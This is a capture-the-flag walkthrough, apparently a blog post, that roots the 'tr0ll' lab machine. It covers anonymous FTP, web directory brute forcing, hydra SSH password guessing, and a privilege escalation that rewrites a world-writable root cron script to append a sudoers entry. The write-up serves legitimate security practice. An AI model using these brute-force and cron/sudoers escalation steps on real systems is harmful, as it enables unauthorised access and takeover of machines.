Back to Posts

tr0ll

Posted in CTF

Checkout Slayer Labs!
Networks Engineered to Exploit.
- Windows/UNIX - Domains/Subnets - Initial/Post/Lateral - Low Cost VPN Ranges -


tr0ll


Our initial scan yields:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

We’ll enumerate these 3 services to get a good understanding of possible vectors, increasing our attack surface and reducing time wasted in rabbit holes.

  • FTP
  • SSH
  • HTTP

FTP

Starting with FTP we can verify that it actually is FTP, vsftp service and allows anonymous login.

root@kali:/usr/share/nmap/scripts# nmap -sV 192.168.72.138
root@kali:/usr/share/nmap/scripts# nmap --script ftp-anon.nse 192.168.72.138 -p21

Our inital scan was correct. We can now anon FTP login to do some initial investigation.

root@kali:/home# ftp 192.168.72.138
Connected to 192.168.72.138.
220 (vsFTPd 3.0.2)
Name (192.168.72.138:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10  2014 .
drwxr-xr-x    2 0        112          4096 Aug 10  2014 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.

Trying to PUT or travese into other directories is futile, but all hope is not lost. We are able to capture a lone file of: lol.pcap

We are able to GET this file and save to our local machine. Before we commit to this vector, we’ll enumerate the other services - we can put this on the top or our todo list.


SSH

Since SSH is a common and relatively secure service, we won’t consider this a low hanging fruit.

We can verify the SSH service and check if root user accepts passwords (which it does).

root@kali:/# nmap -sV 192.168.72.138 -p22
root@kali:/# ssh -vvv root@192.168.72.138

We can try to brute force ssh as root, but we’ll put that near the end of the list.


HTTP

Running Nikto a few things come up, but nothing real juicy.

  • Apache/2.4.7
  • OS: Ubuntu
  • 1 entry in robots.txt: /secret
  • Apache deafault README page
  • Two images with pages /index.html & /secret/index.html

We can use curl to verify headers and check if anything jumps out at us.

root@kali:/# curl -i -L 192.168.72.138
root@kali:/# curl -i -L 192.168.72.138/secret
root@kali:/# curl -i -L 192.168.72.138/robots.txt

Nothing really. Let’s brute force some dirs.

root@kali:/# dirb http://192.168.72.138
root@kali:/# gobuster -u http://192.168.72.138 -e -s '200,403,204,500' -w /usr/share/seclists/Discovery/Web_Content/apache.txt

Just what we’ve found from Nikto.

We can always run some larger wordlists to dig into the webserver more - we can put that on our todo list near the end as well.


Plan of Attack

  1. Investigate lol.pcap
  2. Brute force SSH with root or found usernames
  3. Run large wordlist (which we can do in the background)

We’ve download the lol.pcap file, which we can open up with wireshark.

Following this packet capture file by “TCP Stream” you can get an idea on what this file entails. Make sure to remove the filter to see the important part.

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!

Going to http://192.168.72.138/sup3rs3cr3tdirlol gives us a dir listing with roflmao ELF file.

Dowloading it to our local machine, and digging into it, we see a hint..

root@kali:~/Downloads# file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
root@kali:~/Downloads# strings roflmao 
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2

Find address 0x0856BF to proceed. Using this string as a directory we find another list of files.

Two folders with two files. One looks like a good user list and the other folder “this_folder_contains_the_password” has a file of “Pass.txt” containing the string: Good_job_:)

Trying the newly created userlist (tru.txt) and the password string, should yield us a successful ssh login correct, or maybe via ftp..? Wrong (I tried)

Since the name of this machien is tr0ll, and we’ve seen it be sneaky previously, we can take a step back and look at the file directory. Nothing hidden in headers or source, but take a look at this again: this_folder_contains_the_password/

“this_folder” - so the string pass.txt would technically be it, right? We’ll see…

root@kali:/# hydra -t 7 -L /home/tru.txt -p Pass.txt 192.168.72.138 ssh
..SNIP..
[22][ssh] host: 192.168.72.138   login: overflow   password: Pass.txt

A successful hit overflow:Pass.txt

Logging in with the creds, we have a limited low priv shell. Going through the basic linux priv esc guide we get to a point where we can search for world writable folders.

$ find / -writable -type d 2>/dev/null
/tmp
/run/user/1002
/run/shm
/run/lock
/var/tmp
/sys/fs/cgroup/systemd/user/1002.user/14.session
/proc/4184/task/4184/fd
/proc/4184/fd
/proc/4184/map_files

Nothing in the /tmp folder, but something in the /var/tmp folder. An app called cleaner.py (that aint stock) is somewhere with a hint to it being ran by root cron job every 2 minutes.

$ cd /var/log
$ cat cronlog
*/2 * * * * cleaner.py

So let’s try to find this cleaner python app. A basic locate or find command doesn’t bring us any luck. Using the below find command does yield something..

$ find / -name *cleaner* |grep cleaner.py

Looks like it’s located in /lib/log/cleaner.py AND it’s world writable. Since it’s executed by root, we can alter the script to add our low priv user to the /etc/sudoers file.

#!/usr/bin/env python
import os
import sys
try:
	os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
	sys.exit()

Save it, and wait the 2 minutes per cronlog then..

$ sudo su
sudo: unable to resolve host troll
[sudo] password for overflow: 
root@troll:~# whoami
root
root@troll:~# cat proof.txt 
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc

Good stuff, we have root.


Custom Cyber Ranges >>

https://slayerlabs.com

Read Next

Vulnix